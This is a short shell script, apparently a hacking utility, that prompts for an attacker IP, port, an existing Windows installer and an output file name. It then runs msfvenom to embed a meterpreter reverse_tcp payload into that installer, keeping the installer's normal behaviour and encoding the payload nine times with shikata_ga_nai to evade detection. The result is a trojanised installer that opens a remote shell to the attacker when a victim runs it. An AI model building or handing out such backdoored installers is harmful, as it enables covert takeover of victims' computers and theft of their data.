#!/bin/sh

# Colors
blue='\e[1;34'
cyan='\e[1;36m'
green='\e[1;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'

# Banner
banner(){
    clear
    echo -e ""
    echo -e "$red    フ$yellowァ$greenッ$cyanク$okegreenユ$lightgreenー"
    echo -e ""
}

echo -e "$white"
read -p " Your IP : " ip;
read -p " Port : " port;
read -p " Installer : " ins;
read -p " Output : " out;

msfvenom -a x86 --platform windows -x $ins -k -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -i 9 -f exe -o $out

echo -e " Payload : $out"
